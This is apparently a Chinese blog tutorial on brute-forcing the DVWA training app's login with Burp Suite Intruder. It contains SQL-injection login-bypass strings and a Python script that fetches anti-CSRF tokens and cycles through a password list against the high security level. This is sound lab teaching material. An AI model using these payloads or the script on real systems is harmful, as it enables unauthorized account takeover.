DVWA暴力破解和Burp Suite使用

最新推荐文章于 2025-04-25 10:23:25 发布
最新推荐文章于 2025-04-25 10:23:25 发布
阅读量859 收藏 4
点赞数 1
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_40482449/article/details/109289375
版权
一、暴力破解流程

(1)抓包
(2)导入intruder
(3)清空参数
(4)添加所选参数
(5)添加字典
(6)爆破

二、Burp Suite参数暴力破解选择的

(1)sniper
使用一个字典,在破解用户名和密码的过程中,破解分为两个步骤:密码先保持不变,用户名逐个匹配字典中的值;然后用户名保持不变,密码逐个匹配字典中的值。
(2)battering ram
使用一个字典,在破解用户名和密码的过程中,使用同用户名同密码的匹配方式,逐个取出字典中的值,这个值即是用户名也是密码(适用于用户名和密码相同的破解)
(3)pitchfork
使用两个字典,在破解用户名和密码过程中,两个字典的同一行分别为用户名和密码,逐一进行匹配。字典短的匹配不到,破解结束(简称:同行匹配)
(4)cluster bomb
使用两个字典,在破解用户名和密码过程中,逐一拿出第一个字典中的每个值,匹配第二个字典中的所有值;(简称:交叉匹配)

三、万能密码(暴力破解low级别)

在这里插入图片描述
(1) admin ’ #
(2) admin ’ or ‘1’='1

四、暴力破解
1、low级别

直接进行暴力破解或者万能密码

2、medium级别

使用暴力破解,万能密码受到限制
(1)相对于low级别,增加了mysqli_real_escape_string()函数,此函数会转义sql语句中的特殊字符
在这里插入图片描述
(2)masql_real_escape_string()函数介绍
在这里插入图片描述
在这里插入图片描述

3、high级别

high级别每次的登录就会出现出现新的token值
在这里插入图片描述
使用脚本先获取token值,然后暴力破解

from bs4 import BeautifulSoup
import requests,re

#构造数据包
attack_ip = input('输入DVWA所在IP:')


header={'Host': f'{attack_ip}',
		'Cache-Control': 'no-cache, must-revalidate',
	    'If-None-Match': "307-52156c6a290c0",
		'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',
		'Accept': '*/*',
		'Referer': f'http://{attack_ip}/dvwa/vulnerabilities/brute/index.php',
		'Accept-Encoding': 'gzip, deflate, br',
		'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
		'Cookie': 'security=high; PHPSESSID=355dbnek6b5vnjce6181eg9k07'}
requrl = f"http://{attack_ip}/dvwa/vulnerabilities/brute/index.php"
 
def get_token(URL,header):
	#req = urllib.Request(url=URL,headers=header)
	response = requests.get(url=URL,headers=header)
	print (response.status_code,end='  ')
	the_page = response.text
	# print(the_page)
	print (len(the_page))
	#使用正则表达式获得token值
	token = re.findall(r"user_token.*?value='(.*?)'",the_page)
	# print(token[0])
	return token[0]


user_token = get_token(requrl,header)

i=0
for line in open('常用密码.txt'):
	URL = f"http://{attack_ip}/DVWA-master/vulnerabilities/brute/index.php"+"?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token
	# print(URL)
	i = i+1
	print (i,'admin',line.strip(),end = ' ')
	user_token = get_token(URL,header)
4、impossible级别

使用登录次数限制,超过次数自动锁定账户
在这里插入图片描述

随风6034
关注
利用DVWA学习burpsuit暴力破解B/S架构网站
weixin_51693574的博客
12-28 597
利用DVWA学习burpsuit暴力破解B/S架构网站 1.登陆本地搭建的dvwa,将等级调为high(low等级medium等级添加字典直接爆破即可。) 2.进入暴力破解关卡,随便输入用户名密码,打开burpsuite进行抓包。 3.将抓到的包发送给在intruder模块(ctrl+i),清除变量后在需要爆破的位置添加变量,选择clusterbomb模式。 4.加载本地字典或者手动添加payload,有效负载集1、2为用户名密码,3为token。线程设置为1,依次点击复制value值。
DVWA靶场-Brute Force暴力破解~保姆级教程!!!
2301_77360738的博客
05-09 6468
DVWA靶场初体验,超简单的暴力破解!!!
burpsuitedvwa结合实现抓包密码爆破
lingdukafeibj的博客
08-02 5274
首先时burpsuite的安装代理设置,dvwa的平台搭建。(以下内容是本人学习的记录) burpsuite 简介 Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。 安装配置 java环境 因为burpsuite是在JAVA环境下运行的,所以首先应该配置好JAVA环境; 安装jdk-8u201-windows-
暴力破解+Burp Suit
最新发布
qq_74135847的博客
04-25 1385
但每次输入错误,验证码会刷新,所以需先让验证码保持正确状态。抓包发现每次登录时 token 都不同,进一步分析两次抓包的数据包,发现第二次抓包的 token 是第一次从服务器返回的,由此推断服务器每次会发送新 token 给浏览器,用于下次登录验证,不一致则被拒绝。然后修改密码,再次发送数据包,发现验证码仍有效,说明服务器对验证码的验证存在漏洞,可绕过,该验证码可一直使用。由此可知,第三关的验证码在客户端验证,只有正确时才向服务器发送数据包,与第二关的服务器端验证机制不同,明白了差异后,第三关通关。
Burpsuite + DVWA 入门实战
热门推荐
LYSM
04-10 1万+
Burpsuite 版本:2.0 浏览器:火狐 不再介绍怎么安装激活 。 1.firefox代理设置 2.firefox的证书设置 url栏输入 http://burp,点击 CA Certificate 下载证书(放桌面就行) 导入证书 3.burpsuite的设置 然后就可以抓包了 注意抓包的时候浏览器打不开网页属于正常现象,如果需要继续浏览,点击“intercept is on”按钮即可...
DVWA通过教程之暴力破解Brute Force
→_→
09-23 3272
原理可参考:浅谈“暴力攻击” Brute Force Low 服务器端核心代码 分析: low级别的代码直接获取用户输入的用户名密码,密码再经过MD5进行加密,所以杜绝了通过密码进行SQL注入的可能。然后查询数据库中,查询出结果来了说明用户名密码正确。这里对输入的用户名密码没经过任何的过滤检查。 漏洞利用: 方法一:爆破利用burpsuite 我们输入admin 任意的密码,然后用burpsuite进行抓包 发送到 Intruder模块 ,这里会对所有可能..
渗透测试实验_使用BurpSuite暴力破解DVWA密码 BurpSuite四种暴力破解类型 安全等级Low Medium High
weixin_47133613的博客
03-16 9887
文章目录
BurpSuite使用暴力破解漏洞
qq_25096749的博客
01-06 345
(1) 点击proxy代理——intercep拦截——intercept on拦截开启——open browser开启内置浏览器——反问数据即可看到阶段的数据报文。(2) Request页面右键——Send to Repeater把请求数据发送到repeater。(3) Repeater页面点击Send——Response页面会显示服务器返回响应报文。1、BurpSuite抓http数据包。2、http请求报文讲解。
Burpsuite 暴力破解DVWA密码
LALAAYANG的博客
10-30 4556
首先,设置浏览器代理: 设置firefox代理之后,通过Burpeuite查看请求,熟悉页面: 查看到的请求内容: 查看历史拦截消息: 下面进行DVWA密码破解,在已知用户名的情况下进行密码破解。设置安全模式为“low”之后,进行破解,输入用户admin,输入密码password,点击登录之后进入Bp: 暴力破解密码,拦截到的登录界面网页请求: 上传自己的字典,并开始攻击: 这时,我们可以在wireshark中查看抓到的内容,进一步理解bp爆破的原理(即不断向网页发送大量请求): 查看攻击结
DVWA系列(一)——使用Burpsuite进行Brute Force(暴力破解
橘子女侠
04-29 7334
1. Brute Force(暴力破解)简介 暴力破解一般是指穷举法,顾名思义,暴力破解的原理就是使用攻击者自己的用户名密码字典,一个一个去枚举,尝试是否能够登录。理论上来说,只要字典足够庞大,枚举总是能够成功的! 但实际发送的数据并不像想象中的那样简单——“ 每次只向服务器发送用户名密码字段即可!”,实际情况是每次发送的数据都必须要封装成完整的 HTTP 数据包才能被服务器接收。但是你...
dvwa暴力破解
yuysjx的博客
01-26 748
dvwa暴力破解
dvwa通关教程--暴力破解
weixin_67803043的博客
09-21 663
dvwa通关教程--暴力破解
【网络安全】DVWA靶场实战&BurpSuite内网渗透
九芒星的博客
07-22 6914
借助DVWA靶场,对用户登录进行渗透测试
DVWA——暴力破解
qq_74806534的博客
01-06 5331
7.payload settype选择如图,然后加载字典,可以用自己的,也可以用bp自带的字典,我这里选择bp自带的Directories-short.6.选择sniper狙击,然后点击clear$,清除bp自己选择的爆破位置,选择password后面的位置,点击add$.9.然后开始爆破,主要看长度不一样的,显然4765是我们想要的答案,直接点击。10.最后放包,回到dvwa,填写我们爆破的结果,可以看到我们成功了。8.下一步,点击options,先清屏,然后加入字段welcome。
DVWA暴力破解
m0_65614852的博客
04-25 1010
(LOW)等级 1通过源码发现并没有对登录做限制,可尝试万能密码登录,也可burp抓包破解 右键发送到Intruder模块进行下一步; 将原有标记值清除Clear,箭头所指保留即可; 添加字典,我这里就直接load文件了 1为账号,2为密码,添加完成点击 Start 开跑; 最后长度与其他不一样的就是正确密码; (medium)等级 这里标注的意思是是没登陆失败密码错误是会睡眠2s,还是同样操作,不过就是比上一次慢点; 这里还是可以跑出的我就...
使用Burp Suite暴力破解——DVWA靶场
Aquarius_ego的博客
04-06 1438
使用Burp Suite暴力破解——DVWA靶场
DVWA--暴力破解
weixin_56440174的博客
06-14 2158
1. Brute Force 暴力破解漏洞原理:暴力破解”是一攻击手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。1.Low:绕过方法:使用burpsuite抓包,发送到爆破模块 2.medium:源码分析:利用原理:源码分析后,发现medium相比low多加了一个对于用户名的特殊字符转义,输入密码的MD5,防止了sql注入,对登陆失败的用户做了一个sleep(2),还是可以爆破。 3.high源码分析:利用原
burpsuite dvwa
02-28
### 使用 Burp SuiteDVWA 进行漏洞检测渗透测试 #### 配置 Burp Suite 浏览器代理设置 为了使 Burp Suite 能够拦截并分析 HTTP/HTTPS 流量,在启动 Burp Suite 后需调整浏览器的网络设置以便通过 Burp 的...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值